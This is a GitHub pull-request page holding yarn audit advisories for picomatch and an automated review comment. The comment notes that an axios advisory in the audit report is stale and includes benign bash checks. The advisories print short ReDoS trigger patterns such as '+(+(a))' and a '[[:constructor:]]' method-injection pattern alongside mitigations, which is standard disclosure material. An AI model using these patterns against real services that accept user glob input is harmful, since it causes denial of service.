{"type":"auditAdvisory","data":{"resolution":{"id":1115554,"path":"vite>tinyglobby>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115554,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115549,"path":"laravel-vite-plugin>vite-plugin-full-reload>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"2.3.1","paths":["laravel-vite-plugin>vite-plugin-full-reload>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115549,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":"<2.3.2","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 2.3.2 or later","patched_versions":">=2.3.2","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115552,"path":"laravel-vite-plugin>vite-plugin-full-reload>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"2.3.1","paths":["laravel-vite-plugin>vite-plugin-full-reload>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115552,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":"<2.3.2","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 2.3.2 or later","patched_versions":">=2.3.2","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditSummary","data":{"vulnerabilities":{"info":0,"low":0,"moderate":3,"high":5,"critical":0},"dependencies":156,"devDependencies":0,"optionalDependencies":0,"totalDependencies":156}}
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai bot Mar 30, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo '--- package manifest ---'
rg -n '"axios"\s*:\s*"\^1\.14\.0"' package.json

echo
echo '--- diff: audit-before.json vs audit-report.json ---'
diff -u audit-before.json audit-report.json || true

echo
echo '--- direct axios finding in audit-report.json ---'
rg -n '"path":"axios"|\"version\":\"1\.13\.2\"' audit-report.json

LOCKFILE="$(fd -HI '^yarn\.lock$' . | head -n1 || true)"
if [ -n "${LOCKFILE:-}" ]; then
  echo
  echo "--- axios resolutions in ${LOCKFILE} ---"
  rg -n -C1 'axios@|version "1\.13\.2"|version "1\.14\.0"' "$LOCKFILE"
fi

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 370

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo '=== Checking for axios 1.13.2 in audit-report.json ==='
if grep -q '"version":"1.13.2"' audit-report.json; then
  echo '[FOUND] axios 1.13.2 is present in audit-report.json'
  grep -n '"version":"1.13.2"' audit-report.json | head -5
else
  echo '[NOT FOUND] axios 1.13.2 not in audit-report.json'
fi

echo
echo '=== Checking if audit files are identical ==='
if cmp -s audit-before.json audit-report.json; then
  echo '[IDENTICAL] audit-before.json and audit-report.json are byte-for-byte identical'
else
  echo '[DIFFERENT] Files differ'
  diff audit-before.json audit-report.json | head -20
fi

echo
echo '=== package.json axios version ==='
grep -o '"axios":\s*"[^"]*"' package.json

echo
echo '=== Checking lockfile for axios version ==='
if [ -f yarn.lock ]; then
  echo '[yarn.lock found]'
  grep -A2 'name: axios' yarn.lock | head -10
elif [ -f package-lock.json ]; then
  echo '[package-lock.json found]'
  grep -B2 -A2 '"axios"' package-lock.json | grep -A2 '"version"' | head -10
fi

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 4910

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo '=== yarn.lock: axios entries ==='
grep -A3 '^"axios@' yarn.lock | head -20

echo
echo '=== Summary: What version of axios is locked? ==='
grep -A1 '"axios@\^1\.' yarn.lock | grep -E '^\s*version' | head -5

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 104

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo '=== yarn.lock file info ==='
wc -l yarn.lock
head -30 yarn.lock

echo
echo '=== Search for axios in yarn.lock ==='
grep -i axios yarn.lock | head -20

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 1635

Audit report shows axios 1.13.2 advisory despite yarn.lock locking 1.14.0.

The audit-report.json file contains a DoS advisory (CVE-2026-25639) for axios 1.13.2, but yarn.lock locks axios to version 1.14.0 (axios@^1.14.0). Version 1.14.0 is >= 1.13.5 (the patched version), so this advisory should not appear in a proper audit of the current dependency tree. Either the audit was not regenerated after the lockfile update, or the lockfile was not properly updated before the audit was run. Regenerate the audit report from the current lockfile to verify the dependency tree is consistent.

🧰 Tools
🪛 Biome (2.4.9)

[error] 2-2: End of file expected

(parse)

[error] 3-3: End of file expected

(parse)

[error] 4-4: End of file expected

(parse)

[error] 5-5: End of file expected

(parse)

[error] 6-6: End of file expected

(parse)

[error] 7-7: End of file expected

(parse)

[error] 8-8: End of file expected

(parse)

[error] 9-9: End of file expected

(parse)

🤖 Prompt for AI Agents 
Verify each finding against the current code and only fix it if needed.

In `@audit-report.json` around lines 1 - 9, The audit-report.json contains a stale
advisory for axios (CVE-2026-25639 referencing version 1.13.2) even though
yarn.lock pins axios@^1.14.0; regenerate the audit from the current lockfile by
re-running the project audit command (e.g., npm/yarn audit or your audit
tooling) using the current yarn.lock, confirm axios resolves to >=1.13.5
(1.14.0) and that the CVE-2026-25639 entry is gone, then replace
audit-report.json with the regenerated report and commit the updated
audit-report.json and yarn.lock together to ensure consistency.

@nielsdrost7 nielsdrost7 deleted the automated/yarn-update-25 branch April 11, 2026 15:44
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@coderabbitai coderabbitai[bot] coderabbitai[bot] left review comments

Assignees

No one assigned

Labels

automated-pr dependencies yarn

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@nielsdrost7